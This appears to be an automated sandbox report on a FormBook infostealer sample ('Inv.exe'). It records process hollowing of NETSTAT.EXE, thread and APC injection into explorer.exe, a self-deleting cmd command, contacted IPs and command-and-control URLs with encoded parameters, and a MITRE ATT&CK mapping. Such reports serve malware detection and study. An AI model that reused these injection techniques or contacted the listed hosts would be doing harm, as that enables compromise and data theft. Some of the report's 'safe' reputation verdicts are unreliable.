          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02EE4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02EE4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E97016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E97016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E97016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E1B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E1B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E1B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02EA41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E461A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E461A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02ED49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02ED49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02ED49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02ED49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E969A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E399BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E399BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E399BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E399BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E399BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E399BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E399BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E399BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E399BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E399BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E399BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E399BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E3C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E4A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E42990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E1C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E1B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E1B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E3B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E3B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E34120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E34120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E34120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E34120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E34120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E4513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E4513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E19100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E19100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E19100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E276E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E416E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E58EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E436CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02ECFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02EE8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02EE0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02EE0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02EE0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E946A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02EAFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E2766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E3AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E3AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E3AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E3AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E3AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E27E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E27E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E27E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E27E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E27E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E27E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02EDAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02EDAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E1E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02ECFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E1C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E1C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E1C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E48E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02ED1608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E4A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E4A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E537F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E28794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E97794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E97794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E97794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E2FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02EE8F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E2EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E14F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E14F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E4E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02EE070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02EE070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E4A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E4A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E3F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02EAFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02EAFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02ED14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E96CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E96CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E96CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02EE8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E2849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E3746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E4A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02EAC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02EAC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E4BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02EE740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02EE740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02EE740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E96C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E96C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E96C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E96C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02ED1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02ED1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02ED1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02ED1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02ED1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02ED1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02ED1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02ED1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02ED1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02ED1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02ED1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02ED1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02ED1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02ED1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E2D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E2D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02EDFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02EDFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02EDFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02EDFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02EC8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 0_2_01236B80 GetProcessHeap,RtlAllocateHeap,GetProcessHeap,HeapAlloc,
          Source: C:\Users\user\Desktop\Inv.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\Inv.exeCode function: 0_2_0123C0A3 SetUnhandledExceptionFilter,UnhandledExceptionFilter,
          Source: C:\Users\user\Desktop\Inv.exeCode function: 0_2_0123C080 SetUnhandledExceptionFilter,
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0123C0A3 SetUnhandledExceptionFilter,UnhandledExceptionFilter,
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0123C080 SetUnhandledExceptionFilter,

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 198.54.117.217 80
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exeNetwork Connect: 172.96.186.206 80
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\Inv.exeSection loaded: unknown target: C:\Users\user\Desktop\Inv.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\Inv.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\Inv.exeSection loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write
          Source: C:\Users\user\Desktop\Inv.exeSection loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write
          Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\Inv.exeThread register set: target process: 3424
          Source: C:\Windows\SysWOW64\NETSTAT.EXEThread register set: target process: 3424
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\Inv.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\Inv.exeSection unmapped: C:\Windows\SysWOW64\NETSTAT.EXE base address: 3F0000
          Source: C:\Users\user\Desktop\Inv.exeProcess created: C:\Users\user\Desktop\Inv.exe 'C:\Users\user\Desktop\Inv.exe'
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Inv.exe'
          Source: explorer.exe, 00000002.00000000.675251989.0000000000AD8000.00000004.00000020.sdmpBinary or memory string: ProgmanMD6
          Source: explorer.exe, 00000002.00000002.1046948722.0000000001080000.00000002.00000001.sdmp, NETSTAT.EXE, 00000004.00000002.1047969407.0000000004280000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000002.00000002.1046948722.0000000001080000.00000002.00000001.sdmp, NETSTAT.EXE, 00000004.00000002.1047969407.0000000004280000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000002.00000002.1046948722.0000000001080000.00000002.00000001.sdmp, NETSTAT.EXE, 00000004.00000002.1047969407.0000000004280000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000002.00000002.1046948722.0000000001080000.00000002.00000001.sdmp, NETSTAT.EXE, 00000004.00000002.1047969407.0000000004280000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000002.00000000.690752068.000000000A716000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWnd5D
          Source: C:\Users\user\Desktop\Inv.exeCode function: 0_2_0123D7B7 cpuid
          Source: C:\Users\user\Desktop\Inv.exeCode function: 0_2_01238431 GetLocalTime,

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000001.00000002.709447848.00000000013E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.1046926366.0000000002A40000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.709353232.0000000001200000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.1046222240.0000000000350000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.673713344.0000000000D90000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.709266055.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.1046964776.0000000002A70000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0.2.Inv.exe.d90000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Inv.exe.d90000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Inv.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Inv.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000001.00000002.709447848.00000000013E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.1046926366.0000000002A40000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.709353232.0000000001200000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.1046222240.0000000000350000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.673713344.0000000000D90000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.709266055.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.1046964776.0000000002A70000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0.2.Inv.exe.d90000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Inv.exe.d90000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Inv.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Inv.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsCommand and Scripting Interpreter2Path InterceptionProcess Injection512Rootkit1Credential API Hooking1System Time Discovery1Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsNative API1Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion2Input Capture1Security Software Discovery151Remote Desktop ProtocolInput Capture1Exfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsShared Modules1Logon Script (Windows)Logon Script (Windows)Process Injection512Security Account ManagerVirtualization/Sandbox Evasion2SMB/Windows Admin SharesArchive Collected Data1Automated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Deobfuscate/Decode Files or Information1NTDSProcess Discovery2Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol3SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptObfuscated Files or Information3LSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonSoftware Packing1Cached Domain CredentialsSystem Network Configuration Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSyncSystem Network Connections Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemSystem Information Discovery112Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 339347 Sample: Inv.exe Startdate: 13/01/2021 Architecture: WINDOWS Score: 100 36 www.hwcailing.com 2->36 40 Found malware configuration 2->40 42 Malicious sample detected (through community Yara rule) 2->42 44 Antivirus / Scanner detection for submitted sample 2->44 46 5 other signatures 2->46 11 Inv.exe 2->11         started        signatures3 process4 signatures5 54 Maps a DLL or memory area into another process 11->54 56 Tries to detect virtualization through RDTSC time measurements 11->56 14 Inv.exe 11->14         started        process6 signatures7 58 Modifies the context of a thread in another process (thread injection) 14->58 60 Maps a DLL or memory area into another process 14->60 62 Sample uses process hollowing technique 14->62 64 Queues an APC in another process (thread injection) 14->64 17 explorer.exe 14->17 injected process8 dnsIp9 30 www.achonabu.com 172.96.186.206, 49767, 80 SINGLEHOP-LLCUS Canada 17->30 32 nationshiphop.com 34.102.136.180, 49759, 49769, 80 GOOGLEUS United States 17->32 34 7 other IPs or domains 17->34 38 System process connects to network (likely due to code injection or exploit) 17->38 21 NETSTAT.EXE 17->21         started        24 autofmt.exe 17->24         started        signatures10 process11 signatures12 48 Modifies the context of a thread in another process (thread injection) 21->48 50 Maps a DLL or memory area into another process 21->50 52 Tries to detect virtualization through RDTSC time measurements 21->52 26 cmd.exe 1 21->26         started        process13 process14 28 conhost.exe 26->28         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          Inv.exe39%VirustotalBrowse
          Inv.exe46%ReversingLabsWin32.Trojan.AgentTesla
          Inv.exe100%AviraHEUR/AGEN.1106536
          Inv.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          0.2.Inv.exe.d90000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          1.2.Inv.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          www.hwcailing.com0%VirustotalBrowse
          millcityloam.com0%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.a-zsolutionsllc.com/hko6/?OHiLR=jJBpdVbhUrMh9TJP&k2JxoV=eHiVknBCI+BDKnmhqMCE00F5l7UznldHUBBF08pOLsPmMyvxBhFlr4jwGXO1VYCPd09p0%Avira URL Cloudsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.nationshiphop.com/hko6/?k2JxoV=oEk1uwcTzyLRlLIEQvULAWzRIM6BrJQxm2nmuYWQkJ+zIoa1KldNyrAb+1j5GiVi4vc4&OHiLR=jJBpdVbhUrMh9TJP0%Avira URL Cloudsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
